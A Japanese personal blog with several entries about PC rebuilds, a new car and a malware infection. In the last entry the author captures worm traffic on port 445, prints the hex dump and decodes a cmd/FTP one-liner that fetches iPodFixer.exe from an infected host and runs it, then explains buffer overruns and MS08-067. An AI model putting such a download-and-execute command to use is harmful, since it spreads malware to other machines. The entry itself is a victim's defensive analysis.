Kaz@EP3のブログ一覧

昨日セットアップした２台のマシンはトラブルでやりなおしになりましたorz

うーちゃんさんマシンは、どうもDVDの再生がカクカクするなぁと思ったらDMAモードが2だ。どうして誤動作するのか一生懸命調べていて、電源を切ったらもうHDDがうんともすんとも言わない。買ってから時間は経ってるけど全然使ってないHDDなのに・・・こんなにきれいに動作停止したのは初めて。

で、チェックしようとCore i7のマシンに繋いだらマシンごと上がらない。あきらめて再起動したらExplorerでデータ実行防止違反

きのうの明け方になんかインストールして、マシンリブートしてないのかなぁ。

で、20:00頃からずっと調べていたんですがどうしてもわかりません。

たぶん怪しいのはDeamon Toolsとか数件なんだけど、Explorerが死ぬので手も足も出ない。セーフモードだとアンインストーラが動かない。八方ふさがり。

で、先ほどあきらめて再インストールを始めました。

まだ、先は長いです（泣

パソコンを新しくしました。

いままで私の最強マシンはCore2DuoのVAIOくんだったのですが、会社のデスクトップがCore2Duoになったので、自宅での仕事がかったるくなっていました。

札幌にいることもあって、（行く前からだけど）今までP3のServer2003が1台とP4 2.4cGHzのデスクトップが１台、２４時間運転しておりましたが、IntelさんのCore I7が出たのを機に、入れ替えをしました。

P3マシンを止め、空にした筐体にP4マシンの内部を移植、ここで問題。P3マシンにはSATAの電源コネクタが無い～。あわてて秋葉原に追加購入に行き、P4の入っていたケースにはめでたくCore i7が収まりました。

環境はだいたい移植完了。

物理CPUは１個、コアが４個のHyper Thredingなので論理CPU８個見えてます



ここまでやって買わなかったのはケースと、DVDドライブと、FDドライブだけ。でも９万で収まっちゃったのでびっくりです。

P3はヤフオクにでも出すかな～。捨てるのより高ければ御の字ですね。
DVD/CDドライブとケースさえあればP3 Dual CPUのサブマシンが組めますからね。

眠っていたWindyのPolo（マイクロアルミケース、Celron2.8G、512MB、120GB）も、XP Homeのインストールが完了し、マイミクのうーちゃんさんのもとへ旅立つ準備ができました。

このケース、気に入っていたんだけど、最新のCPUは入らないし、かといって捨てるには忍びないし・・・Linux仕様にしていました。

どんどん荷物が少なくなると、それはそれで幸せです～

でも今回導入したHDDは1TB、8,900なり。
100～150GBクラスのHDDが4～5台あまってきちゃいました。
これで、壊れたHDDレコーダーからまた150GBが２台出てくるんだよな。

こんど中古HDD市でも開きますか（笑

車買っちゃいました！

最近ずっと欲しいと思う車がなかったのですが・・・。S2000や欧州TypeRは高すぎです（涙

ぴぴぴっと来ちゃいました。

あ、シビックはそのまま、ね。
札幌での通勤用です。

今は、３Ｑ自動車のアルト君を有償で借りていて、夏場はシビックを持ち込むと言うパターンでしたが、アルト君ももうすぐ車検。冬の盛りに車無しもつらいですし、雪が溶けても、車高調の入ったシビック君では、道の悪い北海道ではドライブする気にもなりません。

いろいろ悩んでいましたが良い機会だなと、ネッツ店で「トヨタ３年分ください」と言ってきました（笑

会社の近くに行けば事務所移転になるし、マンションを買えば転勤になるし、思い切った行動を取ると裏目に出るのはお約束なので、きっと４月に「東京に帰ってこい」と言われることでしょう（爆

ま、２重生活も長いのは問題なので、それはそれでアリかな、と。

で、何を買ったかといえば、コレです。

久しぶりの新車、納車は１月です。楽しみ～

新仕様・・・感動しっぱなしでどう表現してよいかまとめ中

３ヶ月も離れていた、それもあるけど

Ｆ：245/40-17、Ｒ：225/45-17
ホイール：プロドライブ
エンジン新品
デフ新品
ＣＲＵＸ新品
ブレンボ新品

ホイールのせいなのかデフのせいなのかタイヤのせいなのかホイールのせいなのか調律のせいなのかそれとも全部か

静止から発進の時、3,000以上でアクセル踏み込んだとき、即座にトンっと背中を押される

バネやタイヤのゴムが縮んでから加速するようなタイムラグが無く、即座に応える

ステアリングを切るとアウト側の加重がすぐにかかって、オンザレールの感覚。

いままでは首都高で緩いコーナーだと、切り込み遅らせてアウト側の車輪にグッと荷重をかけたときだけ感じられたオンザレール感覚が、どのコーナーでも

排気音と振動が低いせいかエンジンのレスポンスは鈍い感じがするが、いざフル加速すると、なんか回転数の上がり方が異常に早い

ＶＴＥＣ入ってからは、また早い

アルトになれて速い速度が怖いのか、足が硬くて振動が増えるのが怖いのか、滅茶苦茶加速してる気がする

南部さんありがとうございます。堪能したりなくて毎日首都高走って通勤してます。


んー、早く走り慣れたサーキットでインプレッションしたいなぁ
土曜日のTC1000はどうやらキャンセル待ちNGだったようで。

今年の冬休みは帰省予定のため、
次に走れるのはスケジュール上１月１０日になりそうです。

eMobileでのブラウジングがやけに遅いなぁ、とここ２～３日気になっていました。が、月曜日に羽田空港でhotspotを使用中に、WrbPageが見られないという問題が頻繁に発生。
仕事しようと思ってフライトの４時間前からラウンジに陣取っていたのに、殆ど仕事が出来ませんでした。

なにか余計なプログラムがバージョンアップのために勝手にダウンロードしてるとか、そう言うことも考えてnetstatを実行。なんかいろんなIPのmicrosoft-ds:445ポートにいくつもコネクションがあるのを発見。

ん？これってもしかしてウィルス？

普段うちのパソコンは安全圏にあるとか、ZoneAlarm動かしてるとか安心していて、公衆回線で使うノートには対処がしてありませんでした。おまけにここ何ヶ月かセキュリティーアップデートを怠っている。

コレは、ヤバイと思い、あわててトレンドのオンラインスキャンを実行。しかし、１時間かけて全ディスクをッスきゃんしてもウィルスは発見できず（アドウェアは２つほど見つかりましたが）

間違いかなぁ、と思いつつ、昨日も色々と調査を進めると、eMobileや無線LANが繋がると同時にワッと445への接続が始まるし、思いっきり怪しい。

パケットモニタで445への送信パケットを調べてみると・・・


[取得日時:2008/11/25 20:23:54.125]

【 IPヘッダ 】
バージョン : 4
ヘッダ長 : 5 ( 20 byte )
サービスタイプ : 0x00
全パケット長 : 1500 byte
識別子(ID) : 42579 ( 0xA653 )
フラグ : 0x2 ( フラグメント禁止, 最終フラグメント )

～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～

00 01 02 03 04 05 06 07-08 09 0A 0B 0C 0D 0E 0F 0123456789ABCDEF
+-------------------------------------------------+-----------------+
00000000 | 45 00 05 DC A6 53 40 00-7F 06 25 A6 72 30 3B 30 | E..ﾜｦS@...%ｦr0;0
00000010 | 72 30 0A 92 06 07 01 BD-0F 82 35 CF 74 57 DD F4 | r0.・..ｽ.・ﾏtWﾝ

～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～

00000510 | 60 56 EB 0D 68 EF CE E0-60 68 98 FE 8A 0E 57 FF | V・h・濮h・・W
00000520 | E7 E8 EE FF FF FF 63 6D-64 20 2F 63 20 65 63 68 | 鉅・cmd /c ech
00000530 | 6F 20 6F 70 65 6E 20 31-31 34 2E 34 38 2E 35 39 | o open 114.48.59
00000540 | 2E 34 38 20 31 39 39 33-39 20 3E 3E 20 69 69 20 | .48 19939 >> ii
00000550 | 26 65 63 68 6F 20 75 73-65 72 20 61 20 61 20 3E | &echo user a a >
00000560 | 3E 20 69 69 20 26 65 63-68 6F 20 62 69 6E 61 72 | > ii &echo binar
00000570 | 79 20 3E 3E 20 69 69 20-26 65 63 68 6F 20 67 65 | y >> ii &echo ge
00000580 | 74 20 69 50 6F 64 46 69-78 65 72 2E 65 78 65 20 | t iPodFixer.exe
00000590 | 3E 3E 20 69 69 20 26 65-63 68 6F 20 62 79 65 20 | >> ii &echo bye
000005A0 | 3E 3E 20 69 69 20 26 66-74 70 20 2D 6E 20 2D 76 | >> ii &ftp -n -v
000005B0 | 20 2D 73 3A 69 69 20 26-64 65 6C 20 69 69 20 26 | -s:ii &del ii &
000005C0 | 69 50 6F 64 46 69 78 65-72 2E 65 78 65 0D 0A 00 | iPodFixer.exe...
000005D0 | 42 42 42 42 42 42 42 42-42 42 42 42 | BBBBBBBBBBBB

---------------------------------------------------------------------------------


ん？

んん～？

アドレス527から展開すると・・・・

cmd /c echo open 114.48.59.48 19939 >> ii &
echo user a a >> ii &
echo binary >> ii &
echo get iPodFixer.exe >> ii &
echo bye >> ii &
ftp -n -v -s:ii &
del ii &
iPodFixer.exe

ウィルス決定！

あぁ～これでこのPCは仕事で使えなくなった・・・


しかしトレンドでも、後で行ったシマンテックのスキャンでも検出されない新種ウィルス？
そんな宝くじみたいな事ってあるんでしょうか。海外にもまだ類似の事例がありませんし。
第一発見者は名前付けたり、情報提供代としてウィルスバスター１年分タダになったりするのかな（笑

そんな場合じゃない！あわててオンラインでウィルスバスターを購入し、トレンドに解析結果を送りました。回答が来るまでにどれだけ時間がかかるのか。

来週社内プレゼンまでに直ってくれることを祈りつつ・・・








<< 解説 >>

・mixrosoft-ds:445
ポート445でNetBios系の通信に使われているポートです。
ここには複数の脆弱性が見つかっており、つい１０月２４日にMS08-067の緊急パッチがMSより出ています。IPアドレスを端から順番に使って445へ接続するようなのは完全にウィルスです。

・パケット
脆弱性を突く方法で最もよく使われるのが、バッファオーバーランという手法です。受け取ったデータが設計の想定以上に大きな場合、受け取ったデータをしまっておく領域を超えて、次のプログラムまで書き換えてしまう場合があります。データを調整して、ちょうどプログラムが流れる場所に悪質なプログラムを書いておけば、プログラムを書き換えることが可能です。
このパケットの前後では複数にわけて1500バイト近くの内容のないデータがいくつも送信されていますので、明らかにバッファオーバーランを狙ったものであることが想像できます。

・データについて
「cmd/c」は、NTのcmd.exeに対するコマンド実行の指示です。
「echo ・・・>>ii」は、「・・・」という文字列をファイル「ii」に追加書き込みする指示です。「&」は複数の指示を１行で実行するためのセパレータです。

ここでは、「ii」というファイルにFTPコマンドでアドレス「114.48.59.48」のポート「19939」に接続し、バイナリモードでファイル「iPodFixer.exe」を取ってこい、という指示が書いてあり、FTPを実行した後、ダウンロードした「iPodFixer.exe」を実行しています。

「114.48.59.48」はこの時点での私のPCのアドレスですし、「19939」でFTPなんて上げてません、。さらに、別の宛先に向けたパケットではポート番号が違っていました。

・ランダムな宛先に445ポートで複数接続
・とんでもなくでかいデータを送っている
・データの中に、送信元にランダムなポートで上げたFTPからファイル落として実行しろ、と言う指示が書いてある

これは通常のアプリではあり得ないことですので、ウィルスと判断しました。
あぁこれは××のツールの特徴なんですよ、ってな恐れもあったんですが、間違いないかと。